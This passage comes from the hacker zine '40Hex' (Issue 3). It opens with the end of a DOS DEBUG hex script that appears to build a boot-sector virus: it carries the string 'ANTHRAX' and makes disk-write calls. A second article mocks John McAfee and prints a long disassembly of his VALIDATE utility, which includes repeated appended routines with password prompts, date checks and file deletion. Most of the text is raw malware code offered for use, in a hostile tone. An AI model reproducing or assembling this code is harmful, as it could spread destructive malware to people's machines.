e 0460 87 85 68 FA AB 8C C8 E2 F7 A3 86 00 AB 8E D8 B4
e 0470 08 CD 13 49 49 A1 E9 03 84 E4 74 01 91 B2 80 B8
e 0480 03 03 CD 13 91 84 E4 75 02 2C 40 FE CC A3 E9 03
e 0490 FF 06 60 04 32 F6 B9 01 00 BB 00 04 B8 01 03 CD
e 04A0 13 8A D6 CB 41 4E 54 48 52 41 58 0E 1F 83 2E 13
e 04B0 04 02 CD 12 B1 06 D3 E0 8E C0 BF 00 04 BE 00 7C
e 04C0 B9 00 01 8B DE FC F3 A5 8E D8 BA 27 04 51 53 50
e 04D0 52 CB 8E C1 B1 04 BE B0 05 83 C6 0E AD 3C 80 74
e 04E0 04 E2 F6 CD 18 92 FD AD 91 B8 01 02 CD 13 81 3E
e 04F0 FE 05 55 AA 75 ED 06 1E 07 1F 32 F6 B9 02 00 33
e 0500 DB B8 02 02 CD 13 E9 EE FE 00 00 00 00 CD 20 CC
e 0510 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A
e 0520 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A
e 0530 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A
e 0540 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A
e 0550 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A
e 0560 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A
e 0570 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A
rcx
480
w
q
-------------------------------------------------------------------------------
HR
40Hex Issue 3 0004
The Strange Case of Validate
- Fall to your knees, begging your way out of this disease.
Well we all know what a dick John Mcafee is. Well with his product
SCAN comes a program VALIDATE. I noticed when I took a close look
at the internal workings of this program (while working on a little
revenge project) that there is text in the program. The strings
read
"Enter password now"
"Access denied"
Well this got me going, what is this??? Well this brings up our
first 40Hex challenge. I am including a dissassembly of validate.
Here it is:
-------------------------------------------------------------------------------
data_1e equ 100h
data_2e equ 102h
data_3e equ 2Ch
data_4e equ 14h
data_5e equ 16h
data_6e equ 18h
data_7e equ 1Ah
data_8e equ 47h
data_9e equ 49h
data_10e equ 4Ah
data_11e equ 59h
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
validate proc far
start:
jmp loc_96
db 0Dh, ' ', 0Dh, 0Ah, 'VALIDATE 0'
db '.3 '
copyright db 'Copyright 1988-89 by McAfee Asso'
db 'ciates.'
db ' (408) 988-3832', 0Dh, 0Ah, 0Dh
db 0Ah, 'Written by Dennis Yelle', 0Dh
db 0Ah, 0Dh, 0Ah
db 1Ah
data_19 db 30h dexed access)
db '123456789ABCDEF'
db 10h, 0Fh, 0Dh, 8, 6, 3
db 1, 0, 0C8h, 10h, 0Ch, 5
db 0, 0C8h, 10h, 0Fh, 2, 0
db 0C8h, 10h, 0Fh, 0Eh, 7, 6
db 0, 0C8h, 10h, 0Fh, 0Dh, 0
db 0C8h
loc_1:
mov al,1
mov ah,4Ch
int 21h
db 0CDh, 20h
loc_2:
jmp short loc_2
validate endp
sub_1 proc near
mov dx,si
loc_3:
lodsb
cmp al,1
ja loc_3
pushf
mov cx,si
sub cx,dx
dec cx
mov ah,40h
mov bx,1
int 21h
popf
jz loc_1
retn
sub_1 endp
sub_2 proc near
mov bp,sp
xchg si,[bp]
call sub_1
xchg si,[bp]
retn
sub_2 endp
db 0B4h, 40h, 0BBh, 2, 0, 0B9h
db 48h, 0, 0BAh, 9, 1, 0CDh
db 21h, 0A1h, 2, 0, 8Ch, 0CBh
db 29h, 0D8h, 3Dh, 0, 10h, 77h
db 52h, 0E8h, 0D8h, 0FFh
db 0Dh, 0Ah, ' Sorry, there is not e'
db 'nough memory available.', 0Dh, 0Ah
db ' I need 66000 bytes of RAM.', 0Dh
db 0Ah
db 1, 0BEh, 80h, 0, 0ACh, 0Ah
db 0C0h
db 74h, 9
loc_4:
lodsb
cmp al,20h
je loc_4
cmp al,0Dh
jne loc_6
loc_5:
jmp loc_10
loc_6:
dec si
mov data_33,si
push si
mov si,197h
call sub_9
mov di,666h
call sub_10
mov si,186h
call sub_9
mov di,866h
call sub_10
call sub_2
and [bx+si],ah
and [bx+si],ah
and [bx+si],ah
and [bx+si],ah
and [bx+si],ah
inc si
db 'ile Name: '
db 0, 5Eh
loc_7:
lodsb
cmp al,20h
jg loc_7
push ax
xor al,al
mov [si-1],al
mov bx,1
mov cx,si
dec cx
mov dx,data_33
sub cx,dx
mov ah,40h
int 21h
push si
call sub_8
mov dx,data_33
mov ax,3D00h
int 21h
jc loc_11
mov data_32,ax
;* call sub_3
db 0E8h, 0B8h, 0
mov ah,3Eh
mov bx,data_32
int 21h
pop si
pop ax
cmp al,0Dh
je loc_9
loc_8:
lodsb
cmp al,20h
je loc_8
cmp al,0Dh
je loc_9
call sub_8
jmp loc_6
loc_9:
mov ax,4C00h
int 21h
loc_10:
mov dx,2E6h
mov cx,84h
jmp loc_17
loc_11:
mov dx,5FBh
mov cx,29h
jmp loc_17
db 'This program prints the validati'
db 'on information for a file.', 0Dh
db 0Ah, 'Examples:', 0Dh, 0Ah, ' '
db ' VALIDATE SCAN.EXE', 0Dh, 0Ah
db ' VALIDATE SCANRES.EXE', 0Dh
db 0Ah
sub_3 proc near
xor ax,ax
mov data_34,ax
mov data_35,ax
loc_12:
mov bx,data_32
mov dx,0A66h
mov cx,8000h
mov ah,3Fh
int 21h
jnc loc_13
jmp loc_16
loc_13:
or ax,ax
jz loc_14
mov dx,ax
push dx
mov si,0A66h
mov di,666h
mov cx,data_34
call sub_11
mov data_34,cx
pop dx
mov si,0A66h
mov di,866h
mov cx,data_35
call sub_11
mov data_35,cx
jmp short loc_12
loc_14:
call sub_2
and [bx+si],ah
and [bx+si],ah
and [bx+si],ah
and [bx+si],ah
and [bx+si],ah
and [bx+si],ah
and [bx+si],ah
and [bp+di+69h],dl
jp $+67h
cmp ah,[bx+si]
and [bx+si],al
mov ax,4202h
mov bx,data_32
xor cx,cx
xor dx,dx
int 21h
jnc $+0Fh
call sub_2
jnz $+70h
db 6Bh, 6Eh, 6Fh, 77h, 6Eh, 0
db 0EBh, 3, 0E8h, 59h, 1, 0E8h
db 0D1h, 0FDh
db 0Dh, 0Ah, ' Date: '
db 0, 0B8h, 0, 57h, 8Bh, 1Eh
db 4Eh, 6, 0CDh, 21h, 73h, 8
db 0BEh, 0DDh, 3, 0E8h, 8Fh, 0FDh
db 0EBh, 26h, 52h, 8Bh, 0C2h, 0B1h
db 5, 0D3h, 0E8h, 25h, 0Fh, 0
db 0E8h, 70h, 1, 0E8h, 98h, 0
db 58h, 50h, 25h, 1Fh, 0, 0E8h
db 65h, 1, 0E8h, 8Dh, 0, 58h
db 0B1h, 9, 0D3h, 0E8h, 5, 0BCh
db 7, 0E8h, 57h, 1, 0E8h, 7Ch
db 0FDh
db 0Dh, 0Ah, 'File Authentication:', 0Dh
db 0Ah, ' Check Method 1 - '
db 0, 8Bh, 0Eh, 52h, 6, 0E8h
db 27h, 0, 0E8h, 43h, 0FDh
db 0Dh, 0Ah, ' Check Method 2 - '
db 0, 8Bh, 0Eh, 54h, 6, 0E8h
db 4, 0, 0E8h, 27h, 0, 0C3h
db 51h, 89h, 0C8h, 88h, 0E0h, 0E8h
db 1, 0
db 58h
sub_4:
mov bx,ax
mov cl,4
shr bx,cl
call sub_5
mov bx,ax
sub_5:
and bx,0Fh
mov dl,data_19[bx]
sub_6:
loc_15:
push ax
mov ah,2
int 21h
pop ax
retn
sub_7:
mov dl,2Dh
jmp short loc_15
sub_8:
mov dl,0Dh
call sub_6
mov dl,0Ah
jmp short loc_15
loc_16:
mov dx,624h
mov cx,29h
loc_17:
mov bx,2
push ax
mov ah,40h
int 21h
jc loc_18
pop ax
loc_18:
mov ah,4Ch
int 21h
sub_3 endp
sub_9 proc near
xor bx,bx
xor cx,cx
inc si
lodsb
loc_19:
mov cl,al
mov ax,1
shl ax,cl
or bx,ax
lodsb
cmp al,0C8h
jb loc_19
mov cl,8
mov di,656h
mov ax,bx
loc_20:
stosw
shr ax,1
jnc loc_21
xor ax,bx
loc_21:
dec cl
jnz loc_20
retn
sub_9 endp
sub_10 proc near
mov si,656h
xor dx,dx
loc_22:
mov cx,dx
mov bx,si
xor ax,ax
loc_23:
shl cl,1
jnc loc_24
xor ax,[bx]
loc_24:
add bx,2
or cl,cl
jnz loc_23
stosw
inc dl
jnz loc_22
retn
sub_10 endp
sub_11 proc near
loc_25:
lodsb
mov bl,cl
xor bl,al
xor bh,bh
mov cl,ch
mov ch,0
add bx,bx
xor cx,[bx+di]
dec dx
jnz loc_25
retn
sub_11 endp
data_27 dw 4240h
data_28 dw 0Fh
data_29 dw 3E8h
data_30 dw 0Ah
sub_12 proc near
cmp dx,data_28
jb loc_32
ja loc_26
cmp ax,data_27
jb loc_32
loc_26:
mov bx,data_27
mov cx,data_28
xor si,si
loc_27:
inc si
shl bx,1
rcl cx,1
jno loc_27
xor di,di
loc_28:
shl di,1
cmp dx,cx
jb loc_30
ja loc_29
cmp ax,bx
jb loc_30
loc_29:
sub ax,bx
sbb dx,cx
inc di
loc_30:
shr cx,1
rcr bx,1
dec si
jge loc_28
push dx
push ax
mov ax,di
xor dx,dx
call sub_14
mov al,2Ch
call sub_19
pop ax
pop dx
div data_29
push dx
call sub_15
jmp short loc_33
sub_13:
xor dx,dx
cmp ax,2710h
jae loc_32
cmp ax,3E8h
jb loc_32
div data_29
or ax,ax
push dx
jz loc_31
call sub_16
loc_31:
pop ax
jmp short loc_34
sub_14:
loc_32:
div data_29
push dx
or ax,ax
jz loc_31
call sub_16
loc_33:
mov al,2Ch
call sub_19
pop ax
sub_15:
xor dx,dx
div data_30
jmp loc_35
db 88h, 0E0h, 32h, 0E4h
sub_16:
loc_34:
cmp ax,0Ah
jb loc_37
xor dx,dx
div data_30
cmp al,0Ah
jb loc_36
loc_35:
push dx
xor dx,dx
div data_30
call sub_17
pop ax
jmp loc_37
sub_17:
loc_36:
push dx
call sub_18
pop ax
sub_18:
loc_37:
add al,30h
sub_19:
mov ah,2
mov dl,al
int 21h
retn
sub_12 endp
db 0Dh, 0Ah, ' Sorry, I cannot open '
db 'the input file.', 0Dh, 0Ah, 0Dh, 0Ah
db ' Sorry, I cannot read the input '
db 'file.', 0Dh, 0Ah
db 90h
data_32 dw 0
data_33 dw 0
data_34 dw 0
data_35 dw 0
db 0ACh, 29h, 0ADh, 29h, 0AEh, 29h
db 0AFh, 29h, 0B0h, 29h, 0E9h, 70h
db 2, 0E9h, 49h, 2
db 14 dup (0)
db 0E9h, 0C7h, 0, 0Dh, 0, 0
db 0
db 44h, 29h
db 42 dup (0)
db 0CCh, 7, 6, 7
db 13 dup (0)
db 3, 2, 0CFh, 0C8h, 0Dh, 0C9h
db 0Dh
db 79 dup (0)
db 0Dh, 0Ah, 'Please enter the passw'
db 'ord now: '
db 0
db 0Dh, 0Ah, 'This program requires '
db 'DOS 3.00 or greater'
db 7, 0Dh, 0Ah, 0, 5Ch, 2Ah
db 2Eh, 2Ah, 0
db 0Dh, 0Ah, '%%211#---4677^^^%'
db 7, 0Dh, 0Ah, 0, 42h, 23h
db 0
db 305 dup (0)
db 50h, 53h, 0A1h, 1, 1, 5
db 3, 1, 0D1h, 0E8h, 0D1h, 0E8h
db 0D1h, 0E8h, 0D1h, 0E8h, 8Bh, 0D8h
db 8Ch, 0C8h, 3, 0C3h, 50h, 0B8h
db 6Bh, 2, 50h, 0CBh, 5Bh, 58h
db 2Eh, 0C6h, 6, 1Ah, 0, 0FFh
db 2Eh, 8Ch, 6, 1Bh, 1, 2Eh
db 0A3h, 1Dh, 1, 2Eh, 89h, 26h
db 1Fh, 1, 2Eh, 8Ch, 16h, 21h
db 1, 8Ch, 0C8h, 8Eh, 0D0h, 0BCh
db 4Fh, 2, 2Eh, 0A1h, 1Dh, 1
db 50h, 53h, 51h, 52h, 56h, 57h
db 55h, 1Eh, 6, 8Ch, 0C8h, 8Eh
db 0D8h, 8Eh, 0C0h, 0A0h, 1Bh, 0
db 3Ch, 50h, 75h, 6, 0E8h, 6Ah
db 0, 0EBh, 15h, 90h, 3Ch, 44h
db 75h, 6, 0E8h, 78h, 0, 0EBh
db 0Bh, 90h
loc_38:
cmp al,4Ch
jne loc_39
call sub_21
jmp short loc_40
loc_39:
stc
loc_40:
pop es
pop ds
pop bp
pop di
pop si
pop dx
pop cx
pop bx
cmp byte ptr cs:data_7e,0
je loc_41
mov ax,cs:data_4e
mov ds:data_1e,ax
mov ax,cs:data_5e
mov ds:data_2e,ax
mov ax,100h
mov cs:data_4e,ax
mov cs:data_5e,ds
jmp short loc_42
loc_41:
mov ax,cs
sub ax,cs:data_6e
add cs:data_5e,ax
loc_42:
pop ax
mov ss,word ptr cs:[121h]
mov sp,word ptr cs:[11Fh]
jmp dword ptr cs:data_4e
db 0BAh, 4, 1, 0E8h, 0BCh, 0
db 0B8h, 0FFh, 4Ch, 0CDh, 21h, 0BAh
db 0AEh, 0, 0E8h, 0B1h, 0, 0C6h
db 6, 58h, 0, 29h, 0BAh, 58h
db 0, 0E8h, 74h, 0, 0E8h, 0BDh
db 0, 0E8h, 87h, 0, 0C3h
sub_20 proc near
mov ah,2Ah
int 21h
cmp cx,ds:data_8e
jb loc_44
cmp dh,ds:data_9e
jb loc_44
cmp dl,ds:data_10e
jb loc_44
jmp short loc_44
db 90h, 0B4h, 30h, 0CDh, 21h, 3Ch
db 3, 73h, 4, 0F8h, 0EBh, 25h
db 90h, 1Eh, 6, 32h, 0C0h, 0B9h
db 0, 80h, 2Eh, 8Eh, 6, 1Bh
db 1, 26h, 8Eh, 6, 2Ch, 0
db 33h, 0FFh
loc_43:
repne scasb
scasb
jnz loc_43
add di,2
push es
pop ds
mov dx,di
mov ah,41h
clc
pop es
pop ds
loc_44:
cmc
retn
sub_20 endp
sub_21 proc near
mov ah,1Ah
mov dx,83h
int 21h
mov ah,4Eh
mov cx,8
mov dx,0FFh
int 21h
mov si,0A1h
mov di,4Bh
cld
loc_45:
lodsb
scasb
stc
jnz loc_ret_46
or al,al
jnz loc_45
loc_ret_46:
retn
sub_21 endp
sub_22 proc near
push ax
push bx
push cx
mov ah,0Ah
int 21h
mov bx,dx
inc bx
mov cl,[bx]
xor ch,ch
jcxz loc_48
locloop_47:
inc bx
not byte ptr [bx]
loop locloop_47
loc_48:
pop cx
pop bx
pop ax
retn
sub_22 endp
sub_23 proc near
push cx
push si
push di
mov cl,ds:data_11e
xor ch,ch
mov si,59h
mov di,1Dh
cld
repe cmpsb
jz loc_49
stc
loc_49:
pop di
pop si
pop cx
retn
sub_23 endp
sub_24 proc near
push bx
push dx
mov bx,dx
loc_50:
mov dl,[bx]
or dl,dl
jz loc_51
call sub_25
inc bx
jmp short loc_50
loc_51:
pop dx
pop bx
retn
sub_24 endp
sub_25 proc near
push ax
mov ah,2
int 21h
pop ax
retn
sub_25 endp
sub_26 proc near
push dx
mov dl,0Dh
call sub_25
mov dl,0Ah
call sub_25
pop dx
retn
sub_26 endp
db 0, 0, 0, 0, 0ACh, 29h
db 0ADh, 29h, 0AEh, 29h, 0AFh, 29h
db 0B0h, 29h, 0E9h, 70h, 2, 0E9h
db 49h, 2
db 14 dup (0)
db 0E9h, 60h, 5, 0Dh, 0, 0
db 0
db 44h, 29h
db 42 dup (0)
db 0EAh, 7, 0Ch, 1Fh, 0
db 12 dup (0)
db 3, 2, 0CCh, 0CEh, 0Dh, 0C9h
db 0Dh
db 79 dup (0)
db 0Dh, 0Ah, 'Please enter the passw'
db 'ord now: '
db 0
db 0Dh, 0Ah, 'This program requires '
db 'DOS 3.00 or greater'
db 7, 0Dh, 0Ah, 0, 5Ch, 2Ah
db 2Eh, 2Ah, 0
db 0Dh, 0Ah, '%%211#---4677^^^%'
db 7, 0Dh, 0Ah, 0, 42h, 23h
db 0
db 305 dup (0)
db 50h, 53h, 0A1h, 1, 1, 5
db 3, 1, 0D1h, 0E8h, 0D1h, 0E8h
db 0D1h, 0E8h, 0D1h, 0E8h, 8Bh, 0D8h
db 8Ch, 0C8h, 3, 0C3h, 50h, 0B8h
db 6Bh, 2, 50h, 0CBh, 5Bh, 58h
db 2Eh, 0C6h, 6, 1Ah, 0, 0FFh
db 2Eh, 8Ch, 6, 1Bh, 1, 2Eh
db 0A3h, 1Dh, 1, 2Eh, 89h, 26h
db 1Fh, 1, 2Eh, 8Ch, 16h, 21h
db 1, 8Ch, 0C8h, 8Eh, 0D0h, 0BCh
db 4Fh, 2, 2Eh, 0A1h, 1Dh, 1
db 50h, 53h, 51h, 52h, 56h, 57h
db 55h, 1Eh, 6, 8Ch, 0C8h, 8Eh
db 0D8h, 8Eh, 0C0h, 0A0h, 1Bh, 0
db 3Ch, 50h, 75h, 6, 0E8h, 6Ah
db 0, 0EBh, 15h, 90h, 3Ch, 44h
db 75h, 6, 0E8h, 78h, 0, 0EBh
db 0Bh, 90h
loc_52:
cmp al,4Ch
jne loc_53
call sub_28
jmp short loc_54
loc_53:
stc
loc_54:
pop es
pop ds
pop bp
pop di
pop si
pop dx
pop cx
pop bx
cmp byte ptr cs:data_7e,0
je loc_55
mov ax,cs:data_4e
mov ds:data_1e,ax
mov ax,cs:data_5e
mov ds:data_2e,ax
mov ax,100h
mov cs:data_4e,ax
mov cs:data_5e,ds
jmp short loc_56
loc_55:
mov ax,cs
sub ax,cs:data_6e
add cs:data_5e,ax
loc_56:
pop ax
mov ss,word ptr cs:[121h]
mov sp,word ptr cs:[11Fh]
jmp dword ptr cs:data_4e
db 0BAh, 4, 1, 0E8h, 0BCh, 0
db 0B8h, 0FFh, 4Ch, 0CDh, 21h, 0BAh
db 0AEh, 0, 0E8h, 0B1h, 0, 0C6h
db 6, 58h, 0, 29h, 0BAh, 58h
db 0, 0E8h, 74h, 0, 0E8h, 0BDh
db 0, 0E8h, 87h, 0, 0C3h
sub_27 proc near
mov ah,2Ah
int 21h
cmp cx,ds:data_8e
jb loc_58
cmp dh,ds:data_9e
jb loc_58
cmp dl,ds:data_10e
jb loc_58
jmp short loc_58
db 90h, 0B4h, 30h, 0CDh, 21h, 3Ch
db 3, 73h, 4, 0F8h, 0EBh, 25h
db 90h, 1Eh, 6, 32h, 0C0h, 0B9h
db 0, 80h, 2Eh, 8Eh, 6, 1Bh
db 1, 26h, 8Eh, 6, 2Ch, 0
db 33h, 0FFh
loc_57:
repne scasb
scasb
jnz loc_57
add di,2
push es
pop ds
mov dx,di
mov ah,41h
clc
pop es
pop ds
loc_58:
cmc
retn
sub_27 endp
sub_28 proc near
mov ah,1Ah
mov dx,83h
int 21h
mov ah,4Eh
mov cx,8
mov dx,0FFh
int 21h
mov si,0A1h
mov di,4Bh
cld
loc_59:
lodsb
scasb
stc
jnz loc_ret_60
or al,al
jnz loc_59
loc_ret_60:
retn
sub_28 endp
sub_29 proc near
push ax
push bx
push cx
mov ah,0Ah
int 21h
mov bx,dx
inc bx
mov cl,[bx]
xor ch,ch
jcxz loc_62
locloop_61:
inc bx
not byte ptr [bx]
loop locloop_61
loc_62:
pop cx
pop bx
pop ax
retn
sub_29 endp
sub_30 proc near
push cx
push si
push di
mov cl,ds:data_11e
xor ch,ch
mov si,59h
mov di,1Dh
cld
repe cmpsb
jz loc_63
stc
loc_63:
pop di
pop si
pop cx
retn
sub_30 endp
sub_31 proc near
push bx
push dx
mov bx,dx
loc_64:
mov dl,[bx]
or dl,dl
jz loc_65
call sub_32
inc bx
jmp short loc_64
loc_65:
pop dx
pop bx
retn
sub_31 endp
sub_32 proc near
push ax
mov ah,2
int 21h
pop ax
retn
sub_32 endp
sub_33 proc near
push dx
mov dl,0Dh
call sub_32
mov dl,0Ah
call sub_32
pop dx
retn
sub_33 endp
db 0, 0, 0, 0, 0ACh, 29h
db 0ADh, 29h, 0AEh, 29h, 0AFh, 29h
db 0B0h, 29h, 0E9h, 70h, 2, 0E9h
db 49h, 2
db 14 dup (0)
db 0E9h, 60h, 9, 0Dh, 0, 0
db 0
db 44h, 29h
db 42 dup (0)
db 0C2h, 7, 9, 0Bh, 0
db 12 dup (0)
db 3, 2, 0CEh, 0CEh, 0Dh, 0C9h
db 0Dh
db 79 dup (0)
db 0Dh, 0Ah, 'Please enter the passw'
db 'ord now: '
db 0
db 0Dh, 0Ah, 'This program requires '
db 'DOS 3.00 or greater'
db 7, 0Dh, 0Ah, 0, 5Ch, 2Ah
db 2Eh, 2Ah, 0
db 0Dh, 0Ah, '%%211#---4677^^^%'
db 7, 0Dh, 0Ah, 0, 42h, 23h
db 0
db 305 dup (0)
db 50h, 53h, 0A1h, 1, 1, 5
db 3, 1, 0D1h, 0E8h, 0D1h, 0E8h
db 0D1h, 0E8h, 0D1h, 0E8h, 8Bh, 0D8h
db 8Ch, 0C8h, 3, 0C3h, 50h, 0B8h
db 6Bh, 2, 50h, 0CBh, 5Bh, 58h
db 2Eh, 0C6h, 6, 1Ah, 0, 0FFh
db 2Eh, 8Ch, 6, 1Bh, 1, 2Eh
db 0A3h, 1Dh, 1, 2Eh, 89h, 26h
db 1Fh, 1, 2Eh, 8Ch, 16h, 21h
db 1, 8Ch, 0C8h, 8Eh, 0D0h, 0BCh
db 4Fh, 2, 2Eh, 0A1h, 1Dh, 1
db 50h, 53h, 51h, 52h, 56h, 57h
db 55h, 1Eh, 6, 8Ch, 0C8h, 8Eh
db 0D8h, 8Eh, 0C0h, 0A0h, 1Bh, 0
db 3Ch, 50h, 75h, 6, 0E8h, 6Ah
db 0, 0EBh, 15h, 90h, 3Ch, 44h
db 75h, 6, 0E8h, 78h, 0, 0EBh
db 0Bh, 90h
loc_66:
cmp al,4Ch
jne loc_67
call sub_35
jmp short loc_68
loc_67:
stc
loc_68:
pop es
pop ds
pop bp
pop di
pop si
pop dx
pop cx
pop bx
cmp byte ptr cs:data_7e,0
je loc_69
mov ax,cs:data_4e
mov ds:data_1e,ax
mov ax,cs:data_5e
mov ds:data_2e,ax
mov ax,100h
mov cs:data_4e,ax
mov cs:data_5e,ds
jmp short loc_70
loc_69:
mov ax,cs
sub ax,cs:data_6e
add cs:data_5e,ax
loc_70:
pop ax
mov ss,word ptr cs:[121h]
mov sp,word ptr cs:[11Fh]
jmp dword ptr cs:data_4e
db 0BAh, 4, 1, 0E8h, 0BCh, 0
db 0B8h, 0FFh, 4Ch, 0CDh, 21h, 0BAh
db 0AEh, 0, 0E8h, 0B1h, 0, 0C6h
db 6, 58h, 0, 29h, 0BAh, 58h
db 0, 0E8h, 74h, 0, 0E8h, 0BDh
db 0, 0E8h, 87h, 0, 0C3h
sub_34 proc near
mov ah,2Ah
int 21h
cmp cx,ds:data_8e
jb loc_72
cmp dh,ds:data_9e
jb loc_72
cmp dl,ds:data_10e
jb loc_72
jmp short loc_72
db 90h, 0B4h, 30h, 0CDh, 21h, 3Ch
db 3, 73h, 4, 0F8h, 0EBh, 25h
db 90h, 1Eh, 6, 32h, 0C0h, 0B9h
db 0, 80h, 2Eh, 8Eh, 6, 1Bh
db 1, 26h, 8Eh, 6, 2Ch, 0
db 33h, 0FFh
loc_71:
repne scasb
scasb
jnz loc_71
add di,2
push es
pop ds
mov dx,di
mov ah,41h
clc
pop es
pop ds
loc_72:
cmc
retn
sub_34 endp
sub_35 proc near
mov ah,1Ah
mov dx,83h
int 21h
mov ah,4Eh
mov cx,8
mov dx,0FFh
int 21h
mov si,0A1h
mov di,4Bh
cld
loc_73:
lodsb
scasb
stc
jnz loc_ret_74
or al,al
jnz loc_73
loc_ret_74:
retn
sub_35 endp
sub_36 proc near
push ax
push bx
push cx
mov ah,0Ah
int 21h
mov bx,dx
inc bx
mov cl,[bx]
xor ch,ch
jcxz loc_76
locloop_75:
inc bx
not byte ptr [bx]
loop locloop_75
loc_76:
pop cx
pop bx
pop ax
retn
sub_36 endp
sub_37 proc near
push cx
push si
push di
mov cl,ds:data_11e
xor ch,ch
mov si,59h
mov di,1Dh
cld
repe cmpsb
jz loc_77
stc
loc_77:
pop di
pop si
pop cx
retn
sub_37 endp
sub_38 proc near
push bx
push dx
mov bx,dx
loc_78:
mov dl,[bx]
or dl,dl
jz loc_79
call sub_39
inc bx
jmp short loc_78
loc_79:
pop dx
pop bx
retn
sub_38 endp
sub_39 proc near
push ax
mov ah,2
int 21h
pop ax
retn
sub_39 endp
sub_40 proc near
push dx
mov dl,0Dh
call sub_39
mov dl,0Ah
call sub_39
pop dx
retn
sub_40 endp
db 0, 0, 0, 0, 0ACh, 29h
db 0ADh, 29h, 0AEh, 29h, 0AFh, 29h
db 0B0h, 29h, 0E9h, 6Ch, 2, 0E9h
db 45h, 2, 0
db 13 dup (0)
db 0E9h, 60h, 0Dh, 0Dh, 0, 0
db 0
db 44h, 29h
db 42 dup (0)
db 0D2h, 7, 1, 1
db 13 dup (0)
db 3, 2, 0CFh, 0CEh, 0Dh, 0CDh
db 0Dh
db 79 dup (0)
db 0Dh, 0Ah, 'Please enter the passw'
db 'ord now: '
db 0
db 0Dh, 0Ah, 'This program requires '
db 'DOS 3.00 or greater'
db 7, 0Dh, 0Ah, 0, 5Ch, 2Ah
db 2Eh, 2Ah, 0
db 0Dh, 0Ah, 'Access denied'
db 7, 0Dh, 0Ah, 0, 42h, 23h
db 0
db 305 dup (0)
db 50h, 53h, 0A1h, 1, 1, 5
db 3, 1, 0D1h, 0E8h, 0D1h, 0E8h
db 0D1h, 0E8h, 0D1h, 0E8h, 8Bh, 0D8h
db 8Ch, 0C8h, 3, 0C3h, 50h, 0B8h
db 67h, 2, 50h, 0CBh, 5Bh, 58h
db 2Eh, 0C6h, 6, 1Ah, 0, 0FFh
db 2Eh, 8Ch, 6, 17h, 1, 2Eh
db 0A3h, 19h, 1, 2Eh, 89h, 26h
db 1Bh, 1, 2Eh, 8Ch, 16h, 1Dh
db 1, 8Ch, 0C8h, 8Eh, 0D0h, 0BCh
db 4Bh, 2, 2Eh, 0A1h, 19h, 1
db 50h, 53h, 51h, 52h, 56h, 57h
db 55h, 1Eh, 6, 8Ch, 0C8h, 8Eh
db 0D8h, 8Eh, 0C0h, 0A0h, 1Bh, 0
db 3Ch, 50h, 75h, 6, 0E8h, 6Ch
db 0, 0EBh, 15h, 90h, 3Ch, 44h
db 75h, 6, 0E8h, 7Ah, 0, 0EBh
db 0Bh, 90h
loc_80:
cmp al,4Ch
jne loc_81
call sub_42
jmp short loc_82
loc_81:
stc
loc_82:
jc loc_85
pop es
pop ds
pop bp
pop di
pop si
pop dx
pop cx
pop bx
cmp byte ptr cs:data_7e,0
je loc_83
mov ax,cs:data_4e
mov ds:data_1e,ax
mov ax,cs:data_5e
mov ds:data_2e,ax
mov ax,100h
mov cs:data_4e,ax
mov cs:data_5e,ds
jmp short loc_84
loc_83:
mov ax,cs
sub ax,cs:data_6e
add cs:data_5e,ax
loc_84:
pop ax
mov ss,word ptr cs:[11Dh]
mov sp,word ptr cs:[11Bh]
jmp dword ptr cs:data_4e
loc_85:
mov dx,104h
call sub_45
mov ax,4CFFh
int 21h
db 0BAh, 0AEh, 0, 0E8h, 0B6h, 0
db 0C6h, 6, 58h, 0, 29h, 0BAh
db 58h, 0, 0E8h, 79h, 0, 0E8h
db 0C2h, 0, 0E8h, 8Ch, 0, 0C3h
sub_41 proc near
mov ah,2Ah
int 21h
cmp cx,ds:data_8e
jb loc_88
cmp dh,ds:data_9e
jb loc_88
cmp dl,ds:data_10e
jb loc_88
mov ah,30h
int 21h
cmp al,3
jae loc_86
mov dx,0D0h
call sub_45
clc
jmp short loc_88
db 90h
loc_86:
push ds
push es
xor al,al
mov cx,8000h
mov es,word ptr cs:copyright+1
mov es,es:data_3e
xor di,di
loc_87:
repne scasb
scasb
jnz loc_87
add di,2
push es
pop ds
mov dx,di
mov ah,41h
int 21h
clc
pop es
pop ds
loc_88:
cmc
retn
sub_41 endp
sub_42 proc near
mov ah,1Ah
mov dx,83h
int 21h
mov ah,4Eh
mov cx,8
mov dx,0FFh
int 21h
mov si,0A1h
mov di,4Bh
cld
loc_89:
lodsb
scasb
stc
jnz loc_ret_90
or al,al
jnz loc_89
loc_ret_90:
retn
sub_42 endp
sub_43 proc near
push ax
push bx
push cx
mov ah,0Ah
int 21h
mov bx,dx
inc bx
mov cl,[bx]
xor ch,ch
jcxz loc_92
locloop_91:
inc bx
not byte ptr [bx]
loop locloop_91
loc_92:
pop cx
pop bx
pop ax
retn
sub_43 endp
sub_44 proc near
push cx
push si
push di
mov cl,ds:data_11e
xor ch,ch
mov si,59h
mov di,1Dh
cld
repe cmpsb
jz loc_93
stc
loc_93:
pop di
pop si
pop cx
retn
sub_44 endp
sub_45 proc near
push bx
push dx
mov bx,dx
loc_94:
mov dl,[bx]
or dl,dl
jz loc_95
call sub_46
inc bx
jmp short loc_94
loc_95:
pop dx
pop bx
retn
sub_45 endp
sub_46 proc near
push ax
mov ah,2
int 21h
pop ax
retn
sub_46 endp
sub_47 proc near
push dx
mov dl,0Dh
call sub_46
mov dl,0Ah
call sub_46
pop dx
retn
sub_47 endp
db 0, 0ACh, 29h, 0ADh, 29h, 0AEh
db 29h, 0AFh, 29h, 0B0h, 29h, 0E9h
db 6Ch, 2
loc_96:
jmp loc_97
db 0
db 13 dup (0)
db 0E9h, 60h, 11h, 0Dh, 0, 0
db 0
db 44h, 29h
db 42 dup (0)
db 0D0h, 7, 6, 6
db 13 dup (0)
db 3, 2, 0CFh, 0C9h, 0Dh, 0CFh
db 0Dh
db 79 dup (0)
db 0Dh, 0Ah, 'Please enter the passw'
db 'ord now: '
db 0
